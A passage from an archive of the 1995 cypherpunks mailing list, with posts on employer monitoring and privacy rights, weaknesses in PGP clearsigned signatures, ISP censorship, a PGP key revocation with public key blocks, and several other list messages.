> That's more of what I was looking for.  I suppose that (I'm still using
> PGP as my example) there could be a shared PGP key, signed by Helen and
> myself, where only the two of us know the passphrase,

Huh? Why? Why would you need such a thing? If you reread what I wrote
above, you would see that such a thing is completely unneeded.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 29 Dec 1995 17:56:40 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Employer Probing Precedents?
In-Reply-To: <9512282259.AA12970@alpha>
Message-ID: <9512290129.AA13043@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray writes:
 > > Another vaguely-related concept is that of tenants' rights to a degree
 > > of security in rental property.
 > 
 > Wrong model.  You don't pay rent to your employer for your computer.

I don't think you read the rest of my note.  I don't think it's
completely clear that I don't pay rent to my employer for my computer.

 > Does this allow for employees keeping encrypted material on their
 > company computer?  I don't think so, or rather I think that it's in
 > the company's rights to ask for the encryption keys under certain
 > circimstances- employee leaving company, employee suing company, etc.
 > If you've kept something damaging on your employers machine, you better
 > delete it before the situation gets so bad that they'll be going through
 > your files.

And still this reminds me of tenants property rights.  (And I do agree
the connection is rather thin, but work with me here.)  An apartment
manager can get in to an apartment for a variety of contractually set
reasons.

Maybe what all this means is that, at some point, employees will begin
demanding explicit contracts w.r.t. computer system policies, just
like for basic stuff like salaries & benefits.  Indeed, I know of
several cases where engineers being courted demanded and got perks
like window offices or an extra few PTO days in their initial offer;
why not a contract for what is and isn't "mine" on the network?

(In that light, it'd probably develop that those without such a
contract would be left on poor legal ground.)

(And we'd better stop before Perry yells at us :-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 29 Dec 1995 16:24:42 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: cool cpunk project proposal: "cpunk approved" logo
In-Reply-To: <199512290136.RAA05099@netcom17.netcom.com>
Message-ID: <Pine.SUN.3.91.951228194221.18855C-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Thu, 28 Dec 1995, "Vladimir Z. Nuri" wrote:

> you totally misunderstand my message. this is NOT an "official" project,
> it is NOT a cooperative project. I am proposing that INDIVIDUALS undertake
> the project under the cypherpunk name. no one has a right to complain
> after all, when there is no *official* cypherpunk standard. really, I do
> LOVE anarchy.

Hey Larry, go for it.  I'm sure it will be every bit as successful
as "Cypherwonks."
 
> . . . I of all people understand cypherpunk psychology . . .

Several of them, in fact.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjsus@atlanta.com
Date: Fri, 29 Dec 1995 17:58:02 +0800
To: cypherpunks@toad.com
Subject: Strategic Investments ....
Message-ID: <199512290101.UAA12519@atlanta.com>
MIME-Version: 1.0
Content-Type: text/plain



This can be some interesting .....


****************************************************************************
**********

                                GLOBAL STRATEGIC SYSTEMS NEWSLETTER

                                                        December, 1995

Strategic Management Investments, Asset Allocation, Evaluation and Review

Strategic Management System (SMS) investments are long-term investments and
total ROIs of these investments can only be evaluated after several years
from the initial decisions and activities. However, this does not mean that
the organization can not evaluate many specific elements and short-term
projects of the whole SMS project separately and obtain some good feedback
and information about the short-term performance within one year or sooner.
The implementation of an overall SMS can be divided into small development
projects such as back-up system, customer complaint processing,
environmental communication and employee recruiting system development.
Specific Return on Investment and other financial and cost objectives can be
established for these projects, and they can be evaluated and monitored on a
quarterly and/or annual basis. However, the main strategic objective, the
aim of the SMS, can only be achieved, when all elements of the SMS have been
implemented, integrated and operated effectively. To justify, specific
investment decisions, both short-term and long-term financial indicators can
be used, which can satisfy many passive investor's requirements to commit to
the long-term investments.

Depending on the field of technology and business complexity, the
organization can spend up to 30 % of its annual revenue in the strategic
investments including system development and any new technology R&D
activities. In some cases, costs can be higher. What is the portion of this
amount that is invested in the development of the SMS? With some rough
information, it was possible to calculate that about 25 % of the total
annual strategic investment was spent in one ISO 9000 quality system
development. This 25 % was invested in organizational capability, improved
quality assurance and additional equipment, manpower and machine
acquisitions. Using the above estimation, the management estimated that it
had invested up to 7.5 % of its annual revenue in the strategic management
system development activities.  The major portion of this investment can be
used in tactical, short-term development projects such as returned goods
processing and test and equipment control, where the investment performance
data can be obtained faster; and the rest of the SMS investment can be used
for project/program management and coordination, organizational
restructuring, responsibility and authority definition, document and data
control and any other supporting system development activities, the
financial monitoring can be more difficult. The major cost categories in the
SMS development projects are: 1. development, implementation and training
time (manpower excluding external training, consulting and assessment
activities), 2. equipment and machine acquisitions, 3. materials such as
office supplies and 4. external project activities.

Investments in the development of any SMS can be either tactical or
strategic. The financial performance of the tactical investments is very
often much easier to evaluate than the evaluation of the long-term
investments that may not have specific and measurable investment objectives
and/or the accounting information to evaluate the performance against any
specific objectives which can be difficult to obtain. It is possible to
develop specific budgets for each element of the SMS development project and
identify the sources of development benefits and cost reductions that can be
used for evaluating the financial performance of each project. The financial
performance (including the maintenance of development budgets and the
achievement of investment performance ratios such as Return on Investment
and Investment Payback Period) can be reviewed and evaluated on a quarterly
and annual basis. Any consolidated investments in the whole Strategic
Management System development and the SMS development progress can be
reviewed in the annual Strategic Planning activities by the top management
in the same way as any specific tactical investments can be reviewed and
analyzed in the departmental level to identify any problem areas, any
potential problems and to determine and initiate necessary corrective and/or
preventive actions to achieve or maintain all financial performance
objectives and targets.

The organization should manage its investments in the SMSs such as ISO 9000,
ISO 14000 or Information Security Systems as it manages all its capital
expenditures or any investments in financial instruments such as stocks and
bonds. These investments have to be controlled, managed, reviewed and
improved upon on an on-going basis by the managerial level. Each element of
the SMS development can have its own budget and budget responsibility. The
organization may establish its own unique accounting system for each SMS
development project including specific cost and expenses categories, and
identifying specific sources of financial benefit information that can be
used to calculate financial ratios. Any over spending or other negative
financial performance issues can be brought to the attention in the
management reviews, which may lead to the initiation of necessary corrective
and preventive actions. It is easy to overspend and waste financial
resources such as the waste of manpower without adequate accounting, record
keeping and monitoring systems and methods. The utilization of actual
financial performance measures helps the organization also to see actual
financial benefits from the strategic investments and to justify additional
SMS development activities. However, we still have the question: "How much
should the organization invest in any specific SMS to satisfy its future
business requirements?" 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 29 Dec 1995 16:53:50 +0800
To: cypherpunks@toad.com
Subject: Ecash graphic images?
Message-ID: <199512290458.UAA15779@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Could anyone provide some pointers to a gif or jpeg file containing
good-looking ecash coins?  I would like something larger and more
detailed than the "we accept ecash" you see everywhere.  Thanks very
much.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 16:40:52 +0800
To: cypherpunks@toad.com
Subject: Re: Employer Probing Precedents?
Message-ID: <ad08b1600b0210047eb3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've purged the four accumulated names off the cc: list. I urge other to
do the same, as the headers are getting clogged up, and people are often
getting two copies.)


At 10:59 PM 12/28/95, Mike McNally wrote:

>Another vaguely-related concept is that of tenants' rights to a degree
>of security in rental property.

Actually, tenants have nearly absolute rights of privacy. Landlords cannot
enter the premises whenever they wish, conduct bed checks, sniff for
marijuana, etc.

However, landlords are also not held liable (in most cases) for the illegal
acts of tenants. (Obvious exceptions include recent developments with
"crack house" laws, or where the tenants are using a house as a base of
operations, such as shooting from windows...and even then the landlord's
responsibility is to cooperate with law enforcement: he is not liable for
the shootings, nor for anything else that he could not have reasonably
known about or controlled.)

Ditto for hotel owners. I wrote a long essay for the Cyberia list using
these examples as jumping off points for a view of law in cyberspace.
Basically, that ISPs be treated as hotel owners. Not liable for the
misdeeds of customers in the  "rooms" (in realspace hotels, or in
cyberspace).

However, corporations aren't given the luxury of disassociating themselves
from the actions of their employees. (Contract workers are a further issue,
and the issue of whether they supply their own tools/computers, workspace,
etc., enters in.)

I maintain that my employees are beholden to me as to what they run on
their computers. They can always choose not to work for me. (And the same
applies to hotels, actually. Were a hotel to have stringent rules on
in-room behavior, such as the YMCAs and religious retreat hotels have, then
customers have little right to complain about bed checks, mixed sex bans,
etc. That most hotels have no such rules says more about where the
Schelling points are than it does about the efficacy of rules and laws.


>Though the ownership==control equation works sometimes, and is
>appealing to reason, I don't think things are always so simple.

Nor do I think things are always simple. But it pays to think about
proposed laws from a perspective of maximizing personal choice. (The choice
of the owner of a hotel, or computer, or car, to establish the basis for
trading use of his property for other considerations.)

--Tim May


We got computers, we're tapping phone lines.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 29 Dec 1995 22:07:49 +0800
To: cypherpunks@toad.com
Subject: practical annoyances from multi-level security?
Message-ID: <Pine.SOL.3.91.951228220718.12483A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Does anybody have any pet peeves and gripes about using 
systems with a compartmentalised security model- things that took ages to 
do even though they didn't really impact security, features that just got 
in the way or were too complicated to really use, etc?

I'm currently working on a problem that seems to have some analogies to 
the compartmentalised problem, running code with various levels of trust 
were deliberate read-up and accidental write-down could be a breach. 
I've  personally never used a system of this sort, but I've heard from 
friends in the RAF doing COM/SEC (more COM than SEC) that MLS can be a 
real pain at times. [for the truly paranoid, the RAF operates a network 
of communication satellites called Skynet :-)]

Simon
p.s. 
  still no luck on the Hackers soundtrack - I did recognise a few prodigy 
tracks though

(defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (J.Francois)
Date: Fri, 29 Dec 1995 17:56:18 +0800
To: mjsus@atlanta.com
Subject: Re: Strategic Investments ....
In-Reply-To: <199512290101.UAA12519@atlanta.com>
Message-ID: <m0tVVY1-000xhOC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that mjsus@atlanta.com wrote:
 
> 
> This can be some interesting .....
> 
> 
> ****************************************************************************
> **********
> 
>                                 GLOBAL STRATEGIC SYSTEMS NEWSLETTER
> 
>                                                         December, 1995
> 
> Strategic Management Investments, Asset Allocation, Evaluation and Review

Look, I aint no crypto expert or nuthin', but I have spent a lot of time
looking for the algorithm or key to figure this thing out and I can't
find it. I got whole ROOMS of cpu's crankin' on this one, I even called
uncle Al at Fort Meade and he called back and said, 
"....dunno...must be some newfangled stego or something, I'll call you back".

Was this really a newsletter post or do I need to go back to codebreaker 
school?????

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
=========================No Unsolicited Email============================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: 355/113 -- Not the famous irrational number PI, but an incredible
simulation!

iQCVAgUBMONhDrbmxeO+s+1xAQEDvAQAjWwk9q48ZrOEzrpmb+OkTpwjkyqamfgU
Z4KeC46s9GNC5QlW8JdiCfjmmwPFr/skyaGDFEH93V9Em6pl6tPjGI1KogOq5Xon
RJGdconUUwgP8jRKaM3e+uXYCIurQDSwtUVCS0M4jnHobmQjhZ6SfGFHFMdJssEH
dEplAfQy46Y=
=odMQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cadams@fly.HiWAAY.net (Chris Adams)
Date: Fri, 29 Dec 1995 18:00:40 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <4bvub2$4b3@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Newsgroups: alt.security.pgp,sci.crypt,mail.cypherpunks

In article <oTTsgD7w165w@bwalk.dm.com>,
Dr. Dimitri Vulis <dlv@bwalk.dm.com> wrote:
>I'll illustrate the problem with several scenarios of forgeries.

The easy way around this if you think this might happen is just to put a
line at the top of your signed message stating where the message is
supposed to go.  Then if people see it elsewhere, they can figure out
that something is amiss.

See above for an example.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMON8jiJFQNhhNdm5AQHCFgf9GbaCMWRckNQA4y9Av8e0nigYP0GpGxEh
0A2w9dvSJBmuzaMJ8QxERieGVE61U3+VXOLgssdWXZsnqOPBNKk+2hYyx+vatFL9
XKETZV245acLo4VMNNxV4m/hGteuHUb4oQEKCWHwylyh/f9wfvx+ZTjvTyd8RiqQ
nwcpRPhRA4FozOaVNbjZw/A4nmvxq5I3gg3yMet3vfMWKdhLIy4gsvuhRm/asTGo
BUSw8PIJQbFbrXpoyWsP/sWGDa5tjN7Z05HnX9yU3OIa0uk6K6e2xKVJUo3G2Jso
Kts/pw2hqDBJ0K8XFsnicmncnUDz+FGNKqyCGsSFY8TlaVowpNFZJw==
=VpDg
-----END PGP SIGNATURE-----
-- 
Chris Adams (cadams@HiWAAY.net)               Finger for PGP public key 
"So, if anybody wants to have hardware sent to them: don't call me, but
instead write your own unix operating system.  It has worked every time
for me." - Linus Torvalds, author of Linux (Unix-like) OS




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 29 Dec 1995 17:45:36 +0800
To: cypherpunks@toad.com
Subject: Re: Compuserve is Not "Censoring": Look to Governments for the Cause
Message-ID: <ad08c2760e0210048264@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:17 AM 12/29/95, Bill Humphries wrote:

[much good stuff, with which I agree, elided]

>Support your local ISP.

This simple line is very, very important!

Consider two extremes:

* Extreme 1--Internet access via Compuserve, AOL, or other organizations
striving for a "global presence." Every country these organizations does
business in puts pressure on them to control content, supply names of
contacts, etc. Singapore bans 200 newsgroups, Iraq executes the local
sysops, the U.S. jails the corporate executives for allowing
"alt.barney.die.die.die" to corrupt the morals of young people.

* Extreme 2--"Individuals on the Net directly." Joe User has a box on the
Net. Albania is powerless to hassle him. France cannot seize his computer.
(If he's in Country A, that country may harass him, but if he connects to
accomodation addresses in other countries, even this is lessened or avoided
completely.)

Small ISPs are closer to Extreme 2, as they have no presence in Albania,
Iran, France, Chad, or other states desiring to control content. For small
U.S. ISPs, their main worry is what the U.S. government will say they must
do.

Small, local ISPs may of course be more prone to other kinds of pressure.
But it is my experience that small services are less likely to adopt speech
codes and other draconian behavioral laws than are larger and "more
responsible" (:-}) services.

Jay Campbell, one of the sysops at my ISP, "got.net," may want to give his
perspective, if he sees this.

I see a positive longterm trend toward people connecting through smaller,
more local services. Hard to enforce Albania's laws on 20,000 small
Internet connection services. Even longer term, the anarchy of the Net will
reach its true flowering when millions of users are directly connected.

How ya gonna keep em down when they're directly on the Net?

--Tim May

We got computers, we're tapping phone lines.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hajo@quijote.in-berlin.de (Hans-Joachim Zierke)
Date: Sat, 30 Dec 1995 08:35:44 +0800
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <oTTsgD7w165w@bwalk.dm.com>
Message-ID: <5-oG4BKKYgB@quijote.in-berlin.de>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Dr. Dimitri Vulis writes:

> I suggest to the kind folks working on PGP 3 that there should be a
> standard protocol to include within the signed portion the information on
> when and for whom this text is written: i.e. the list of e-mail recipients
> and/or Usenet newsgroups, which could be easily compared with the RFC
> 822/1036 headers of an e-mail/Usenet article.


This assumes that every Usenet site uses RFC 822/1036 headers locally. This
is no real-world assumption. 

And the clearsign problem can be solved with MIME only, since currently, 
the MIME 8-bit character set conversion will kill the validity of 
signatures, regardless whether being forged or not.

Since I know this, I seldom use clearsigning. Quite simply, it does not 
work, and that's a more severe problem. If an error on signature validation
is the normality, not the exception, the whole stuff does not make any 
sense.



hajo


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Sig validation of clearsigned 8 bit text is uncertain.

iQCVAwUBMORRda1Qa39mIA0ZAQELEAQAryOaVDZIhnYQETxhmHyJktRei3080gXV
77Oy5Qo3/WdO7cvFdR+CKytbZQlV7GHS4lQ+N0MCPHH79+vLnw8xvQ+3htkzerjF
u6tgjiEnbR/YNCvjEq01aU2RVHgycg680WVOH4DqUNTi7yAY2G5Sc6K2LAD4AQrp
toniWTWanyY=
=+LZR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@utopia.hacktic.nl>
Date: Fri, 29 Dec 1995 14:45:33 +0800
To: cypherpunks@toad.com
Subject: [reply to anonymous] Re: rsaref
Message-ID: <199512282306.AAA28036@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text


to whom it may concern:

rsaref20 is available on ftp.hacktic.nl since may 1995 in

 /pub/replay/pub/crypto/LIBS/rsaref20.zip

 -AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Light Ray <fricke@roboben.engr.ucdavis.edu>
Date: Fri, 29 Dec 1995 18:50:48 +0800
To: cypherpunks@toad.com
Subject: FW: your financial transactions posting (fwd)
Message-ID: <Pine.HPP.3.91.951229002106.13984A-100000@roboben.engr.ucdavis.edu>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Fri, 29 Dec 1995 00:02:50 -0800
From: Bud Aaron <bud@checkmaster.com>
To: "'privacy@ftc.gov'" <privacy@ftc.gov>
Cc: "'hwg-business@daft.com'" <hwg-business@daft.com>
Subject: FW: your financial transactions posting


----------
From:  Greg Metcalfe[SMTP:biosphere@proaxis.com]
Sent:  Thursday, December 28, 1995 9:35 PM
To:  bud@checkmaster.com
Subject:  your financial transactions posting

Bud,

I've seen some well thought out messages in the commercial transactions
listserver, but you are the first that I've seen with real numbers.  Would
you do us all a favor and make sure that you get some of this information to
the privacy@ftc.gov discussion?  I hope I'm not impertinent for asking.  But
numbers are probably our only hope.  The gov has never really been into
quantitative thinking...

TIA
---
Greg Metcalfe                         |  The secret is getting
E-mail biosphere@proaxis.com          |      enough sleep.
URL http://www.proaxis.com/~biosphere |        Usually.  

The following is a copy of the information mentioned above:

The following article is quoted directly from Bank Technology News

"Are Internet Security Fears Unfounded?
Just how safe is the Internet? Pretty darn safe, according to
Forrester Research, Inc., Cambridge, MA. Forrester predicts
Internet fraud will occur far less frequently than current rates
of fraud with cellular telephones, toll calls and credit cards
(see chart).
Cellular telephone fraud costs the phone industry almost $20
per $1000 in revenue, Forrester says, and toll-call fraud eats
up $16 per $1000 in revenue. Meanwhile, credit-card fraud cost
MasterCard almost $1.50 per $1000 in revenue in 1993. In
contrast, Forrester says companies can expect to lose only
$1 per $1000 of transactions on the Internet. 
Forrester's contentions on the safety of the Internet are backed
up by some of the judges in this year's Best of the Newest bank
technology survey. While many of the judges expressed concern
over security issues, quite a few were also confident that the
Internet will become a stalwart transaction system. See page one
for further analysis of all the newest banking technologies."

The chart accompanying this article shows the fraud levels in
graphic form.

You folks keep making drafts as a collection system seem more
and more attractive. The fact that drafts MUST be deposited (not
just cashed) and that the bank is going to want to know the
depositor quite well means that tracking is excellent. The
requirement added by the FTC that those whose accounts are
being drafted must be notified by mail makes the system even
safer.

Let me add this - some level of security is obviously needed but
regardless of the level of security, fraud will occur. All of these
arguments for high levels of security remind me of the need for
virus protection. Yes, virus attacks are real but virus protection
vendors certainly make money by raising greater fear than may
be realistic.

Bud Aaron
bud@checkmaster.com
http://www.checkmaster.com/internetchecks/



The privacy list is run automatically by the Majordomo list manager.
Please mail questions/problems to owner-privacy@ftc.gov





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@darkwing.uoregon.edu>
Date: Fri, 29 Dec 1995 19:10:40 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Employer Probing Precedents?
Message-ID: <199512290937.BAA21468@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:12 PM 12/28/95 -0800, Tim May wrote:

>However, corporations aren't given the luxury of disassociating themselves
>from the actions of their employees. (Contract workers are a further issue,
>and the issue of whether they supply their own tools/computers, workspace,
>etc., enters in.)

I think this point about "contract workers" is going to become a lot more
interesting as people move away from the traditional "employee for life"
model and towards working at home/telecommunity, or working as
subcontractors/consultants, etc.

Further, it's becoming more common for employees to own their own
communcations tools, and bring them to work. Arguments about a right to
eavesdrop as being derived from workplace property ownership don't seem to
work where an employee is talking on their personal cell phone,
getting/sending messages on the SkyTel two-way pager that they pay for,
using their laptop/Newton/PDA to get/send E-mail (using their private
ISP/POPmail provider mailbox), and so forth. The concerns (about disclosure
of secrets or wasting of time) raised to justify the invasions of employee
privacy are still present, of course, but not the convenient "it's not your
phone so you have no privacy" excuse. 

Employee/contractor ownership of work tools (or non-work related
communication tools in the workplace) is probably going to get even more
interesting; recent Ninth Circuit decisions re copyright law and licensing
agreements have been sharply restricting the right of software licensees to
allow third parties to use the licensed software. (e.g., _MAI v. Peak_ and
_Triad Systems_, see http://darkwing.uoregon.edu/~gbroiles/triad for more on
this and pointers to other analysis and the opinions themselves) I think
this may lead to software licenses (or hardware ownership) which follows
employees from home to work, and from job to job. Employees may get a
credential from Microsoft, or Borland, or Mathematica or Word Perfect saying
that they're allowed to be using a set of software tools; professionals will
probably pay for those credentials themselves, or have them paid for as a
fringe benefit of employment. An easy connection is to training related to
the "software-right" - the licensor would also certify that the employee has
been subjected to X hours of training and knows at least Y buzzwords and Z
fancy tricks relating to the software. Retired or unemployed workers may
work in a "black market", using software they're trained on but not
licensed/certified for, logging on with the credentials of licensed users
who have died recently or are sleeping. (Similar to the network of
unlicensed uninsured under-the-table contractors, framers, electricians,
drywall installers, etc., who exist at the fringes of construction
activity.) And so on.  

>I maintain that my employees are beholden to me as to what they run on
>their computers. They can always choose not to work for me. (And the same
>applies to hotels, actually. Were a hotel to have stringent rules on
>in-room behavior, such as the YMCAs and religious retreat hotels have, then
>customers have little right to complain about bed checks, mixed sex bans,
>etc. That most hotels have no such rules says more about where the
>Schelling points are than it does about the efficacy of rules and laws.

Subscribers to the Coase theorem would suggest that (modulo transaction
costs) it doesn't matter who is initially assigned the right to determine
whether or not surveillance will occur - the party who most values that
right will bargain for it in the end. Then again, that party may lose
something in exchange - and that's what makes this interesting. (And, I
think, much too complex to simply be dismissed as a matter of "property
rights". Then again, property looks to me like something that law creates,
not something which exists pre-law which law is created to protect. YMMV.)
I'd rather see the right to control surveillance assigned to employees, and
let employers pay extra for it if they think it's necessary to their
business situation. (Some might argue that this is the current situation, or
at least that surveillance is something that market participants bargain
over. My impression is that the current situation is legally murky absent a
clear statement re "we're going to monitor you on the phone and search your
briefcase when you enter and leave" and that a clear resolution re the legal
baseline of surveillance would be useful to bargainers. And if we were to
set a baseline for further bargaining, I'd rather see it set to favor
employees.)
--
"The anchored mind screwed into me by the psycho-  | Greg Broiles
lubricious thrust of heaven is the one that thinks | gbroiles@netbox.com
every temptation, every desire, every inhibition." | 
	-- Antonin Artaud		   	   | 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Philip Zimmermann <prz@acm.org>
Date: Fri, 29 Dec 1995 19:03:34 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Revocation of Zimmermann's fossil key
Message-ID: <199512290844.IAA02565@maalox>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

To whom it may concern:

I have revoked my oldest PGP key, keyID FF67F70B, user ID 
  "Philip R. Zimmermann <prz@sage.cgd.ucar.edu>"
which should no longer be used.  Instead, use my newer key,
keyID C7A966DD, with user ID
  "Philip R. Zimmermann <prz@acm.org>"
The new key has been distributed with all PGP versions since version
2.3a in 1994.

My old email address at the sage site will soon disappear, so I'm 
revoking my old key.  I keep getting mail at my old address at sage
because people get that old address from my old key.  I can't just
revoke my old userID, so I have to revoke the whole key to get people
to stop using it.  Below is my revocation certificate, which I created
shortly after I generated my new key in 1994.  Please discontinue the
use of my old key and my old email address.  Note that this revocation
does not imply that my old key has been compromised.

 -Philip Zimmermann
  prz@acm.org

Here's my old public key with the revocation certificate...
- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a

mQCNAipt8iwAAAEEALGKgLblEQCfcZEiQ+jBFnw5g0B+o16GMPssYBKI7bWgjGbB
DqnkQoMGagNJpcG5tX2bKpJdegi01Sp22QOMpZbdrv/KXRWHp/JjrNLAZHp9B+nl
osbRrPLhGZZA/OgyU6D2GsGnMDcTacPD43wo1g+RUpDv+UjMr+J13g7/Z/cLAAUR
iQCVAgUgLIUrAOJ13g7/Z/cLAQHThQP+NtEJ2yPCXPA+Em45HDWQLwb3X0AM61K0
Mt0Woq54eaC1U5A03oVqV5wEPM6mfrhH18FB6NwO5eROKOdXY1xz7nCggJ9eYfoX
ZH6wfXCqGFSB4oLJU97nFHrqvh69IYSrrlKM/dJ29F5CKVxJApstpnRmfHddrZLP
yfR2y6dxGeW0LFBoaWxpcCBSLiBaaW1tZXJtYW5uIDxwcnpAc2FnZS5jZ2QudWNh
ci5lZHU+
=9UCt
- -----END PGP PUBLIC KEY BLOCK-----

Here's my new public key, generated in May 1994...
- -----BEGIN PGP PUBLIC KEY BLOCK-----

mQCNAiv8ZoAAAAEEAKc4d45hN5qFM79nWGLkrGWputWmtdxJk0BZEbi0kNRbJBC2
p10ASImd//cCDwLR2alBUSt8O2WGik9PBZgthjMOenoDmzKiG8BkE9AFKonyxvD2
lDnqbydXi+YQmOTsWSw4jTTSb3cflhVkf8hVUVpMFQThafV0CmV5hLjHqWbdAAUR
tCJQaGlsaXAgUi4gWmltbWVybWFubiA8cHJ6QGFjbS5vcmc+iQCVAgUQLB48XPTK
AIGN5yLZAQHWtwP/RBiLPN4dnt8sm9qZtK0HPYV0hfdZ4IiSfR0V52uKKMQsIrBJ
x2c5Z2vurBLeKkh8Oecf/X+Zh2mEenrymR/urBCf8xGQnyTPew4t/3IQ5KXsqi2b
uOTysk9Pkk+cqxZTEXJQWixB3fVKrCkR02xbWcRXQ/pPs0ObOE4VLtQT1G2JAGAC
BRAsHUvayj2h/YZap/MBAcRRAliFU3EgFQdOGkC2nCupBAitm/R6CkKtayTZHQrd
e5I/pCY0bGUc6alEnSuqZUyA9HC1fMg0iqsqM4vrQ6PZr2qV0IXDY4miyYNRJyKJ
AJUCBRAr/GdG4nXeDv9n9wsBAYr/BACh4r3DZsq9IOy2mcd+0D0qKV0Ymb887Lw0
KjIBKLmUIqXUw2Rbn8bAnr+GF0qGE61oAHdSSN7pLROmfjl7nMVaODXHOxYuLHAn
HZ0Z/AQsLc5U055Pm6rQ5lKrSaL4z9mEKJTWM9hQDYMZpH4oAC8hIz+apYH+/hBj
ZR9w7AKluw==
=1jM9
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOOo+WV5hLjHqWbdAQHhaQP/SW02cLbkAtHq6cdNHtcJ4YqSlKqxumyR
BYpjKrNatLiVAFQP8njiLRFqPi8rgf6809nnQETIVcyt3BzURakyJLd4UuL3vvqD
lluyGdj9MoaQiQkWIbBMADFdNGFDvRCQkcxhS78hHwXSY7viCSWNnfCdJcpaFNCk
QPfqPsMErMo=
=uH7K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Fri, 29 Dec 1995 20:35:21 +0800
To: cypherpunks@toad.com
Subject: ideath remailer permanently down / PGP key changes for Greg Broiles
Message-ID: <199512291202.EAA02102@darkwing.uoregon.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


I don't think that the local freenet folks are ever going to get my domain name 
again, so I'm officially announcing the closing of the remailer formerly located
